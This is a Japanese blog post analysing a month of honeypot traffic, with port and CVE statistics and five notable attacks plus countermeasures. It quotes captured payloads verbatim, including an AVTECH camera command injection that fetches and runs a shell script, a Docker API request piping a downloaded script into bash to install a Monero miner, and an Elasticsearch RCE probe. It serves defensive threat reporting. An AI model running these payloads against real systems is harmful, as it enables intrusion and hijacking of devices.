sec-chick Blog

サイバーセキュリティブログ

【ハニーポット月次分析】HoneyTrap 1月度〜SSHとIoT製品を狙った攻撃が増加傾向〜

遅くなってしまいましたが、1月分の集計が終わりましたので月次の分析を記載します。今回は月次集計とは別に個人的に気になった攻撃を簡単に解説しています。

 

 



1/1-1/31 Honeytrap 月次分析
※80ポートは別ハニーポットで収集しているため、対象外

1.検知数グラフ

f:id:one-chick-sec:20190209134105p:plain

1/14に検知数が増加していますが、以下のようなRDPの不正アクセスを狙った通信を多数検知していたことが原因となります。

ペイロード
...*%......Cookie: mstshash=Test..........

特定のIPからの通信でなく、複数のIPから検知していました。


2.送信元IP(国)別マップ

f:id:one-chick-sec:20190209134120p:plain


3. 宛先ポート別検知数 TOP10

宛先ポート 検知数 サービス 前月
445 33927 SMB 56831
1433 4779 ms-sql-s 4014
22 4017 SSH 1727
52869 3129 Realtek SDK 1812
3389 3020 RDP 2500
8080 1443 PROXY 1556
81 1355 GoAhead Web Server  3006
443 1032 HTTPS 729
2222 1000 SSH 298
22222 833 SSH 367


前月と比較してSSHへの不正アクセスおよびRealtek SDK脆弱性を狙ったものが大きく増加していました。
SSHについては侵入後に何かをダウンロードする挙動を行うと推測されますが、cowrieのようにエミュレートする機能はHoneytrapにないため、詳細までは調査できませんでした。SSHの接続方法は様々な方法で来ていることを確認できました。

SSHの通信内容例>
SSH-2.0-Ganymed Build_210.
SSH-2.0-JSCH-0.1.51.
SSH-2.0-OpenSSH_4.3
SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u1
SSH-2.0-PuTTY_Release_0.63
SSH-2.0-ZGrab ZGrab SSH Survey
SSH-2.0-libssh2_1.8.0.
SSH-2.0-libssh_0.8.2
SSH-2.0-paramiko_2.4.2

Realtek SDK を狙った脆弱性では、MiraiおよびGafgyt亜種への感染を狙ったものであり、マルウェアの種類には大きな変化はありませんでした。


4. HTTP パスごとにおける検知数

メソッド ポート パス CVE 対象 検知数
POST 443, 52869 等 /picsdesc.xml CVE-2014-8361 Realtek SDK の Miniigd サービス 3079
GET 61-9997 ///admin/config.php CVE-2006-5526 fully modded phpbb 1658
GET 81 login.cgi   GoAhead Web Server 630
GET 7901-9994  等 ///admin/assets/js/views/login.js   WordPress? 452
GET 81,82,5555,6666,
8080-8089  等
/manager/html   Tomcat 管理
マネージャ
113
POST 37215 /ctrlt/DeviceUpgrade_1 CVE-2017-17215 Huawei HG532 103
POST 8080, 55555 /tmUnblock.cgi   Linksys ルータ 67
GET 81-98,
7000-7002 等
/index.action CVE-2018-11776 Apache Struts2 66
POST 8088 /ws/v1/cluster/apps/new-application   Hadoop YARN ResourceManager 66
GET 81, 8080, 8181, 9191 /PHPMYADMIN/scripts/setup.php   phpMyAdmin 25
POST 7001 /wls-wsat/CoordinatorPortType11 CVE-2017-10271 Oracle WebLogic Server 23


IoT製品を狙った攻撃が多く見られました。他にはWordpressWeblogicphpMyadminなどの過去から検知している攻撃も継続的に検知していました。

 

5. 気になった通信


バックドアの設置を狙った通信

<通信内容>
PUT /FxCodeShell.js
※どのようなソースコードであるかはググれば出てくると思います。

<概要>
PUTコマンドで バックドアである FxCodeShell.jsp をアップロードしようとしている通信であり 攻撃が成功した場合、バックドアが設置されてしまいます。 このバックドアはファイルのアップロードや外部サイトからのダウンロード機能、設置したファイルの実行などを行う機能が あると考えられます。

<対策> PUTコマンドによる不要なファイルアップロードを制限する

<個人的な感想>
実際にGoogleでこのファイルを検索してみたところ、いくつかのサイトでも設置されているバックドアでした。 おそらく、すでに利用されていないサイトであると思いますが、実際に設置されているものなんですね。。。。。

② IoT製品を狙った攻撃


<通信内容>
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/sh%20;%20chmod%20777%20sh;/tmp/sh;rm%20-rf%20sh)&password=admin HTTP/1.1
Host: xxx.xxx.xxx.xxx:88
User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.1.3.el7.x86_64

<概要>
AVTECH IP Camera/NVR/DVR に存在するコマンドインジェクションの脆弱性を狙った通信となります。 攻撃が成功した場合、HTTPリクエストから任意のコードが実行されてしまう可能性があります。

<対策>
最新のファームウェアにアップデートする
※明確な情報がなかったため、バージョン情報などは明記していません。

<個人的な感想>
AVTECHは監視カメラ等を製造・販売している台湾メーカであり、MiraiなどのIoTボットネットの標的とされる傾向にあります。 普通に利用しているユーザでアップデートする人も少ないと思うので、まだまだ攻撃者のターゲットになるのではないかと思います。

<参考>
https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/


③Docker Remote API を用いたmoneroのマイナー設置を狙った攻撃


<通信内容>
POST /v1.37/containers/create HTTP/1.1
Host: xxx.xxx.xxx.xxx:2375
User-Agent: Docker-Client/18.03.1-ce (linux)
Content-Type: application/json

{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":["chroot","/mnt","/bin/sh","-c","wget -q -O - hxxps://xxxxxxx.xxx/xx/xxxxx | sed 's/\\r//g' | bash -s"],"Image":"alpine","Volumes":{},"WorkingDir":""
※省略

<概要>
Docker Remote API を用いてDockerコンテナ作成を狙った攻撃であり 今回の攻撃では monero マイナーのDockerイメージが作成されます。

<対策>
リモートでのアクセス元の制御を行う

<個人的な感想>
今回検知した攻撃は monero マイナーに関する攻撃ですが、そこまで検知数が多くないものの、まだまだ標的とされている攻撃方法だと再認識しました。


④Kguard製 DVRの脆弱性を狙った攻撃


<通信内容>
REMOTE HI_SRDK_DEV_GetHddInfo MCTP/1.0
CSeq:197
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15

Segment-Num:0

<概要>
Kguard製 DVRの脆弱性を狙った通信であり 攻撃が成功した場合、任意のコード実行されてしまう可能性があります。

<対策>
 最新のファームウェアにアップデートする
※明確な情報がなかったため、バージョン情報などは明記していません。


<個人的な感想>
調査行為止まりの通信でこのリクエストにレスポンスがあれば、後続の攻撃を検知すると思われます。

<参考情報>
IIJ Security Diary: Hajime ボットの観測状況


⑤ Elaticsearch の脆弱性を狙った攻撃


<通信内容>
GET /_search?source={"script_fields":%20{"iswin":%20{"lang":%20"groovy",%20"script":%20"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).%
~省略~

<概要>
Elaticsearch の脆弱性を狙った攻撃であり 攻撃が成功した場合、任意のコードが実行される可能性があります。 今回、検知した攻撃はwhoamiコマンドであり、調査行為相当の通信でした。
※CVE番号は CVE-2015-1427

<対策>
Elasticsearch 1.4.3 以上にアップデートする

<個人的な感想>
調査行為相当の通信でしたが、この後コマンド成功した場合 攻撃者側がどのような挙動になるかは気になりました。

6.まとめ


SSHおよび Realtek脆弱性を狙った通信が多い傾向
・複数IPからRDPへの不正アクセスが突発的に発生
マルウェアのダウンロード先はIoT製品を狙ったMiraiおよびGafgyt亜種が多い傾向
・検知数は少ないものの、DockerやElaticsearch の脆弱性なども検知

以上となります。もうちょっと情報が取得できるように監視できる範囲を増やそうかなーと思います。